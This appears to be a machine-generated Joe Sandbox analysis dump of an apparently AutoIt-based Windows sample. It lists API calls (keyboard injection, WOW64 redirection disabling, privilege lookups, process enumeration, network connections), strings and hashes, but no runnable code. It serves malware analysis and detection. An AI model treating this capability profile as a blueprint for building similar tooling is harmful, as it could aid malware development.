                                                                          • API ID: MessageSend$MoveWindow
                                                                          • String ID: Listbox
                                                                          • API String ID: 3315199576-2633736733
                                                                          • Opcode ID: 77eb1cec76d590959d9613e15cd0fa2c9b533700cde8bf3d1c6caaae1ce33071
                                                                          • Instruction ID: 7cb36c5bedb25bc0339e8d71dc12046094217f43fab53c9f4b5e27dd8cd3de25
                                                                          • Opcode Fuzzy Hash: 77eb1cec76d590959d9613e15cd0fa2c9b533700cde8bf3d1c6caaae1ce33071
                                                                          • Instruction Fuzzy Hash: 4321B032601118BFDF138F54DC46FEB3BAEEB89750F028129F9559B1A0C6719C518BA0
                                                                          APIs
                                                                          • __snwprintf.LIBCMT ref: 00383A66
                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: __snwprintf_memmove
                                                                          • String ID: , $$AUTOITCALLVARIABLE%d$%:
                                                                          • API String ID: 3506404897-379266330
                                                                          • Opcode ID: 71b120d69773f626ead15f0bb0203f6121fa07af3048005748fdc16131e85d06
                                                                          • Instruction ID: 202afae6a765b857fd96a360ef869d57dd06c318bb509bd175125f21c3d687ae
                                                                          • Opcode Fuzzy Hash: 71b120d69773f626ead15f0bb0203f6121fa07af3048005748fdc16131e85d06
                                                                          • Instruction Fuzzy Hash: 5F219631600219AFCF1AFF64CC82EEE77B9AF48700F544499F445AB281DB34EA45CBA5
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00397772
                                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00397787
                                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00397794
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: msctls_trackbar32
                                                                          • API String ID: 3850602802-1010561917
                                                                          • Opcode ID: bafcaa104f12151b84b5790d65bcf3f9147c47a0a18173174797382a8bf8d5f9
                                                                          • Instruction ID: e9ebce499262073a979f381c99ab6b326905903889460749f3f428e730dc0ce7
                                                                          • Opcode Fuzzy Hash: bafcaa104f12151b84b5790d65bcf3f9147c47a0a18173174797382a8bf8d5f9
                                                                          • Instruction Fuzzy Hash: 3B11E372254208BEEF265FA5DC05FEB77ADEF89B54F124129FA41A60D0C672E851CB20
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: __calloc_crt
                                                                          • String ID: <$@B=
                                                                          • API String ID: 3494438863-4015857562
                                                                          • Opcode ID: 0889223ddd3eaef5dfa872a1c02d4ba490ef81264f15b2aa52b6e829ca97be5c
                                                                          • Instruction ID: 297a744f6ca98cb8418615cf7406179c10dedf009c9254a38ef924d7356d3d78
                                                                          • Opcode Fuzzy Hash: 0889223ddd3eaef5dfa872a1c02d4ba490ef81264f15b2aa52b6e829ca97be5c
                                                                          • Instruction Fuzzy Hash: B9F04475205611AFE7678F66BCD2B56679DE710771F50481BE100CE590EB7098494BC4
                                                                          APIs
                                                                          • __lock.LIBCMT ref: 00339B94
                                                                            • Part of subcall function 00339C0B: __mtinitlocknum.LIBCMT ref: 00339C1D
                                                                            • Part of subcall function 00339C0B: EnterCriticalSection.KERNEL32(00000000,?,00339A7C,0000000D), ref: 00339C36
                                                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00339BA4
                                                                            • Part of subcall function 00339100: ___addlocaleref.LIBCMT ref: 0033911C
                                                                            • Part of subcall function 00339100: ___removelocaleref.LIBCMT ref: 00339127
                                                                            • Part of subcall function 00339100: ___freetlocinfo.LIBCMT ref: 0033913B
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                                                          • String ID: 8<$8<
                                                                          • API String ID: 547918592-3109862915
                                                                          • Opcode ID: d6f06fcaaca60212827158a0d3b31a582ca7c6b90233479e505e7bf6e63a5d17
                                                                          • Instruction ID: 8715f09bd9f976d27cded1dc7ef8f42bbc1e770e9ab14d8cd8a413a7d9b67fc2
                                                                          • Opcode Fuzzy Hash: d6f06fcaaca60212827158a0d3b31a582ca7c6b90233479e505e7bf6e63a5d17
                                                                          • Instruction Fuzzy Hash: C6E08C7294B305EAEA13FBA46987F68A6549B00B21F21115FF045EA1C1CEF81C408717
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00314B83,?), ref: 00314C44
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00314C56
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-1355242751
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00314BD0,?,00314DEF,?,003D52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00314C11
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00314C23
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-3689287502
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,00391039), ref: 00390DF5
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00390E07
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2574300362-4033151799
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000001,00388CF4,?,0039F910), ref: 003890EE
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00389100
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetModuleHandleExW$kernel32.dll
• API String ID: 2574300362-199464113
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: LocalTime__swprintf
• String ID: %.3d$WIN_XPe
• API String ID: 2070861257-2409531811
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• CharLowerBuffW.USER32(?,?), ref: 0038E0BE
• CharLowerBuffW.USER32(?,?), ref: 0038E101
  • Part of subcall function 0038D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0038D7C5
• VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0038E301
• _memmove.LIBCMT ref: 0038E314
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: BuffCharLower$AllocVirtual_memmove
• String ID:
• API String ID: 3659485706-0
APIs
• CoInitialize.OLE32(00000000), ref: 003880C3
• CoUninitialize.OLE32 ref: 003880CE
  • Part of subcall function 0036D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0036D5D4
• VariantInit.OLEAUT32(?), ref: 003880D9
• VariantClear.OLEAUT32(?), ref: 003883AA
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
• String ID:
• API String ID: 780911581-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: Variant$AllocClearCopyInitString
• String ID:
• API String ID: 2808897238-0
APIs
• GetWindowRect.USER32(0114F320,?), ref: 00399863
• ScreenToClient.USER32(00000002,00000002), ref: 00399896
• MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00399903
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
APIs
• SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00369AD2
• __itow.LIBCMT ref: 00369B03
  • Part of subcall function 00369D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00369DBE
• SendMessageW.USER32(?,0000110A,00000001,?), ref: 00369B6C
• __itow.LIBCMT ref: 00369BC3
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: MessageSend$__itow
• String ID:
• API String ID: 3379773720-0
                                                                          APIs
                                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 003869D1
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003869E1
                                                                            • Part of subcall function 00319837: __itow.LIBCMT ref: 00319862
                                                                            • Part of subcall function 00319837: __swprintf.LIBCMT ref: 003198AC
                                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00386A45
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00386A51
                                                                          Similarity
                                                                          • API ID: ErrorLast$__itow__swprintfsocket
                                                                          • String ID:
                                                                          • API String ID: 2214342067-0
                                                                          • Opcode ID: 63042ab80adde3c806099ccf0630d1376f705a12a21fd145ce525f019f024d0e
                                                                          • Instruction ID: 359607e732fbabeed75c1b547814f5181129ea620b25c55d514a4528083b861a
                                                                          • Opcode Fuzzy Hash: 63042ab80adde3c806099ccf0630d1376f705a12a21fd145ce525f019f024d0e
                                                                          • Instruction Fuzzy Hash: 2741B1756003006FEB6ABF24DC97FBA77E89F09B10F048059FA19AF2C2DA759D418791
                                                                          APIs
                                                                          • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0039F910), ref: 003864A7
                                                                          • _strlen.LIBCMT ref: 003864D9
                                                                          Similarity
                                                                          • API ID: _strlen
                                                                          • String ID:
                                                                          • API String ID: 4218353326-0
                                                                          • Opcode ID: cd07a601b0bd0518e3284a3db4888afb3b4e5258dcb80b638be2acbc2ffd2a1e
                                                                          • Instruction ID: 19a2819917e189a0b24aeae9c4cc9ce43e70c217ad7663b431ad1d8803979bf9
                                                                          • Opcode Fuzzy Hash: cd07a601b0bd0518e3284a3db4888afb3b4e5258dcb80b638be2acbc2ffd2a1e
                                                                          • Instruction Fuzzy Hash: D141A431A04204AFCB16FBA4DC96FEEB7A9AF49310F148195F8159B292DB30ED44C750
                                                                          APIs
                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0037B89E
                                                                          • GetLastError.KERNEL32(?,00000000), ref: 0037B8C4
                                                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0037B8E9
                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0037B915
                                                                          Similarity
                                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 3321077145-0
                                                                          • Opcode ID: 3c9d726011825da322d3772f4610aca6ff6e1ed7b471348afc8ffd223433486b
                                                                          • Instruction ID: 9a15a4bdbe577355bd3f975f9fcaa0f5a09d3e1e05ed19a526ec1ea3f3e12a4e
                                                                          • Opcode Fuzzy Hash: 3c9d726011825da322d3772f4610aca6ff6e1ed7b471348afc8ffd223433486b
                                                                          • Instruction Fuzzy Hash: 85410339600610DFCB26EF15C494A99BBE5AF4E310F098099ED4AAF362CB35ED41CB91
                                                                          APIs
                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003988DE
                                                                          Similarity
                                                                          • API ID: InvalidateRect
                                                                          • String ID:
                                                                          • API String ID: 634782764-0
                                                                          • Opcode ID: 404bba8d86868a8cbc3a97f6310f8ba5a4900999229d817af73dac19e3b83bb5
                                                                          • Instruction ID: 12455009a6a2011ce91283b050e929926a226f5dba57a13b700e4f1a84c2fcf6
                                                                          • Opcode Fuzzy Hash: 404bba8d86868a8cbc3a97f6310f8ba5a4900999229d817af73dac19e3b83bb5
                                                                          • Instruction Fuzzy Hash: 30310234604108BFEF239F28DC45FB977A8EB8B310F950416FA15E62A1CF31EA409B52
                                                                          APIs
                                                                          • ClientToScreen.USER32(?,?), ref: 0039AB60
                                                                          • GetWindowRect.USER32(?,?), ref: 0039ABD6
                                                                          • PtInRect.USER32(?,?,0039C014), ref: 0039ABE6
                                                                          • MessageBeep.USER32(00000000), ref: 0039AC57
                                                                          Similarity
                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                          • String ID:
                                                                          • API String ID: 1352109105-0
                                                                          • Opcode ID: c317a4461a868d3d2ddd39cb647a71f759289d6f6a7c71f625aa035b39fca9f4
                                                                          • Instruction ID: 885778efdeb490e200a99af1eef54cd58f2c46c3c8c379c3e7f2fb344bddd6a8
                                                                          • Opcode Fuzzy Hash: c317a4461a868d3d2ddd39cb647a71f759289d6f6a7c71f625aa035b39fca9f4
                                                                          • Instruction Fuzzy Hash: 23415B30A00A199FCF13DF58D884A697BF9FB49310F1982AAE815DF264D731E941DF92
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00370B27
                                                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00370B43
                                                                          • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00370BA9
                                                                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00370BFB
                                                                          Similarity
                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                          • String ID:
                                                                          • API String ID: 432972143-0
                                                                          • Opcode ID: 4299d903eb7267bd191d93c5240224c1b03a69b8ad880c3a783b48e8b0ccccc9
                                                                          • Instruction ID: a5bb9de6005dd319da1d8fee064051aefb679404a15a03a3ec50655a13bfd59e
                                                                          • Opcode Fuzzy Hash: 4299d903eb7267bd191d93c5240224c1b03a69b8ad880c3a783b48e8b0ccccc9
                                                                          • Instruction Fuzzy Hash: 46312870940218EEFF3B8B25CC05BFABBAAAB45318F05C25AE499962D1C37DCA449751
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00370C66
                                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00370C82
                                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 00370CE1
                                                                          • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00370D33
                                                                          Similarity
                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                          • String ID:
                                                                          • API String ID: 432972143-0
                                                                          • Opcode ID: 0418d0571e347e351fe7c8a5380439b8311d385e6c7aa659de3566ae908c45b0
                                                                          • Instruction ID: 46338e417aad8e856324411799988729ebf647e4508e2e36d993604601c593b7
                                                                          • Opcode Fuzzy Hash: 0418d0571e347e351fe7c8a5380439b8311d385e6c7aa659de3566ae908c45b0
                                                                          • Instruction Fuzzy Hash: DB314830940309EEFF3B8A6588047FEBB6AAB45310F05C36BE498AA1D1C37D9D458751
                                                                          APIs
                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003461FB
                                                                          • __isleadbyte_l.LIBCMT ref: 00346229
                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00346257
                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0034628D
                                                                          Similarity
                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                          • String ID:
                                                                          • API String ID: 3058430110-0
                                                                          • Opcode ID: 6542adfa8a675471e7f67f0c9ee1a71446bc02da26cfba2a8500c8820897f4d5
                                                                          • Instruction ID: 40802dff0b4a6b4db9fb3ee2f18652b1bf6cae311bc83083695b2a687f716eba
                                                                          • Opcode Fuzzy Hash: 6542adfa8a675471e7f67f0c9ee1a71446bc02da26cfba2a8500c8820897f4d5
                                                                          • Instruction Fuzzy Hash: 8231CF30600246BFDF238F64CC46BAA7BE9FF42310F164829E8249F1A1D771E950DB92
                                                                          APIs
                                                                          • GetForegroundWindow.USER32 ref: 00394F02
                                                                            • Part of subcall function 00373641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0037365B
                                                                            • Part of subcall function 00373641: GetCurrentThreadId.KERNEL32 ref: 00373662
                                                                            • Part of subcall function 00373641: AttachThreadInput.USER32(00000000,?,00375005), ref: 00373669
                                                                          • GetCaretPos.USER32(?), ref: 00394F13
                                                                          • ClientToScreen.USER32(00000000,?), ref: 00394F4E
                                                                          • GetForegroundWindow.USER32 ref: 00394F54
                                                                          Similarity
                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                          • String ID:
                                                                          • API String ID: 2759813231-0
                                                                          • Opcode ID: fec4a1d7036653e28c3e69573e96609a8ce696dc2e9ff7fbe32706ea7a06f880
                                                                          • Instruction ID: 6a9b62f2b059aac6643c9e045026974ddfb77e0b8696c36da4f0021a6180835c
                                                                          • Opcode Fuzzy Hash: fec4a1d7036653e28c3e69573e96609a8ce696dc2e9ff7fbe32706ea7a06f880
                                                                          • Instruction Fuzzy Hash: 6D310D71D00108AFDB15EFA5C885AEFB7FDEF99300F10446AE415E7241DA759E45CBA0
                                                                          APIs
                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00373C7A
                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00373C88
                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00373CA8
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00373D52
                                                                          Similarity
                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                          • String ID:
                                                                          • API String ID: 420147892-0
                                                                          • Opcode ID: 735181459341362e17f88989274754ad174516f994bece9c8e64e9d8ff998bcd
                                                                          • Instruction ID: e2746106202a8b0bab35c001770a9306707688ecafca71fd31152abe1d6cb1a4
                                                                          • Opcode Fuzzy Hash: 735181459341362e17f88989274754ad174516f994bece9c8e64e9d8ff998bcd
                                                                          • Instruction Fuzzy Hash: B33181311083059FD326EF50C881AAABBE8EF99354F54482DF485CA1A1EB759A49CB92
                                                                          APIs
                                                                            • Part of subcall function 00312612: GetWindowLongW.USER32(?,000000EB), ref: 00312623
                                                                          • GetCursorPos.USER32(?), ref: 0039C4D2
                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0034B9AB,?,?,?,?,?), ref: 0039C4E7
                                                                          • GetCursorPos.USER32(?), ref: 0039C534
                                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0034B9AB,?,?,?), ref: 0039C56E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                          • String ID:
                                                                          • API String ID: 2864067406-0
                                                                          • Opcode ID: 1824991a2a8d55d746c7b464a2962f1362366026d6262f104ee147544d286098
                                                                          • Instruction ID: b285e351bdf3269143596cddd1606ac25077d17531302b8c46ac44c6ae85b747
                                                                          • Opcode Fuzzy Hash: 1824991a2a8d55d746c7b464a2962f1362366026d6262f104ee147544d286098
                                                                          • Instruction Fuzzy Hash: C931A235610058AFCF17CF59C858EEA7BB9EB0A310F46406AF9058B262C731AD50DBA4
                                                                          APIs
                                                                            • Part of subcall function 0036810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00368121
                                                                            • Part of subcall function 0036810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0036812B
                                                                            • Part of subcall function 0036810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0036813A
                                                                            • Part of subcall function 0036810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00368141
                                                                            • Part of subcall function 0036810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00368157
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003686A3
                                                                          • _memcmp.LIBCMT ref: 003686C6
                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003686FC
                                                                          • HeapFree.KERNEL32(00000000), ref: 00368703
                                                                          Similarity
                                                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                          • String ID:
                                                                          • API String ID: 1592001646-0
                                                                          • Opcode ID: 626f561bdacacfb82ef6680dd819a6dbb133ae1ea2cf9073c41cff70be3e0f16
                                                                          • Instruction ID: 8945744a5ccd1329e7f06467b19c1b45d89bcd27f80eca85db68155c8816c3c5
                                                                          • Opcode Fuzzy Hash: 626f561bdacacfb82ef6680dd819a6dbb133ae1ea2cf9073c41cff70be3e0f16
                                                                          • Instruction Fuzzy Hash: 32219D71E00109EFDB11DFA8C949BEEB7B9EF48305F158159E544AB244DB71AE05CB90
                                                                          APIs
                                                                          • __setmode.LIBCMT ref: 003309AE
                                                                            • Part of subcall function 00315A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00377896,?,?,00000000), ref: 00315A2C
                                                                            • Part of subcall function 00315A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00377896,?,?,00000000,?,?), ref: 00315A50
                                                                          • _fprintf.LIBCMT ref: 003309E5
                                                                          • OutputDebugStringW.KERNEL32(?), ref: 00365DBB
                                                                            • Part of subcall function 00334AAA: _flsall.LIBCMT ref: 00334AC3
                                                                          • __setmode.LIBCMT ref: 00330A1A
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                          • String ID:
                                                                          • API String ID: 521402451-0
                                                                          • Opcode ID: 4fad25b4921f79cfcde3445ffe4dc0f7be15c48d147048a3696cc2a86ec932e1
                                                                          • Instruction ID: 5fc57b94d551f6ca8c01c6c919a922dfa10b623ddf12b2e2daec181d92314cf9
                                                                          • Opcode Fuzzy Hash: 4fad25b4921f79cfcde3445ffe4dc0f7be15c48d147048a3696cc2a86ec932e1
                                                                          • Instruction Fuzzy Hash: 9E1127319042446FDB0BB7B4ACC79FE776C9F86320F144116F1059E192EF21598647A1
                                                                          APIs
                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003817A3
                                                                            • Part of subcall function 0038182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0038184C
                                                                            • Part of subcall function 0038182D: InternetCloseHandle.WININET(00000000), ref: 003818E9
                                                                          Similarity
                                                                          • API ID: Internet$CloseConnectHandleOpen
                                                                          • String ID:
                                                                          • API String ID: 1463438336-0
                                                                          • Opcode ID: 118aa4d9b4ae6d280f8b7a68e057cb64a3dbc9ef22e57f2a7be580921d9d2cc1
                                                                          • Instruction ID: 6f37a94eecfb30a02117a189900ad261d25d26f35b01523af98fbbbfb3e59f7c
                                                                          • Opcode Fuzzy Hash: 118aa4d9b4ae6d280f8b7a68e057cb64a3dbc9ef22e57f2a7be580921d9d2cc1
                                                                          • Instruction Fuzzy Hash: 54215E35200705BFEB13AF60DC41BBABBADFB48711F10416AFA5596650DB7298129BA0
                                                                          APIs
                                                                          • GetFileAttributesW.KERNEL32(?,0039FAC0), ref: 00373A64
                                                                          • GetLastError.KERNEL32 ref: 00373A73
                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00373A82
                                                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0039FAC0), ref: 00373ADF
                                                                          Similarity
                                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 2267087916-0
                                                                          • Opcode ID: 85e48381f783fd11453598bfb1f375f641a38cfd043499a6a354b8d5e0d7add5
                                                                          • Instruction ID: 5dd6b5002706f445370401e609f923296c8614143001ae4ebb4b29a6a25b1f74
                                                                          • Opcode Fuzzy Hash: 85e48381f783fd11453598bfb1f375f641a38cfd043499a6a354b8d5e0d7add5
                                                                          • Instruction Fuzzy Hash: D221A334508206DF8725DF28C8828AA77E8EF59364F148A2EF4DDC72A1D735DE45DB82
                                                                          APIs
                                                                            • Part of subcall function 0036F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0036DCD3,?,?,?,0036EAC6,00000000,000000EF,00000119,?,?), ref: 0036F0CB
                                                                            • Part of subcall function 0036F0BC: lstrcpyW.KERNEL32(00000000,?,?,0036DCD3,?,?,?,0036EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0036F0F1
                                                                            • Part of subcall function 0036F0BC: lstrcmpiW.KERNEL32(00000000,?,0036DCD3,?,?,?,0036EAC6,00000000,000000EF,00000119,?,?), ref: 0036F122
                                                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0036EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0036DCEC
                                                                          • lstrcpyW.KERNEL32(00000000,?,?,0036EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0036DD12
                                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,0036EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0036DD46
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: lstrcmpilstrcpylstrlen
                                                                          • String ID: cdecl
                                                                          • API String ID: 4031866154-3896280584
                                                                          • Opcode ID: 8b6ec8236c4280ed920e4049b37b488e8a01995007b652d6e1e38713a5a9f13f
                                                                          • Instruction ID: e67f36836b223d9a0ffbbc72fa531d38dcd6a8d3d1e249975dc4158b7a2bccf8
                                                                          • Opcode Fuzzy Hash: 8b6ec8236c4280ed920e4049b37b488e8a01995007b652d6e1e38713a5a9f13f
                                                                          • Instruction Fuzzy Hash: 53118E3A200305EFCB26AF74D845D7A77A9FF46350F41812AE906CB2A4EB729851C7D5
                                                                          APIs
                                                                          • _free.LIBCMT ref: 00345101
                                                                            • Part of subcall function 0033571C: __FF_MSGBANNER.LIBCMT ref: 00335733
                                                                            • Part of subcall function 0033571C: __NMSG_WRITE.LIBCMT ref: 0033573A
                                                                            • Part of subcall function 0033571C: RtlAllocateHeap.NTDLL(01130000,00000000,00000001,00000000,?,?,?,00330DD3,?), ref: 0033575F
                                                                          Similarity
                                                                          • API ID: AllocateHeap_free
                                                                          • String ID:
                                                                          • API String ID: 614378929-0
                                                                          • Opcode ID: 439676252e1dbf625726188683c0dcfc4b1ddc0d4b5b58b33d25261e43e8de21
                                                                          • Instruction ID: bc76e11e0f6cce5a84b3ccfc8267af8f10af31553ff930725ab10a339d854286
                                                                          • Opcode Fuzzy Hash: 439676252e1dbf625726188683c0dcfc4b1ddc0d4b5b58b33d25261e43e8de21
                                                                          • Instruction Fuzzy Hash: 0411A072D01A16AFCF232F74AC85B6E77DC9B043A1F21492AF9459E252DE7499408690
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 003144CF
                                                                            • Part of subcall function 0031407C: _memset.LIBCMT ref: 003140FC
                                                                            • Part of subcall function 0031407C: _wcscpy.LIBCMT ref: 00314150
                                                                            • Part of subcall function 0031407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00314160
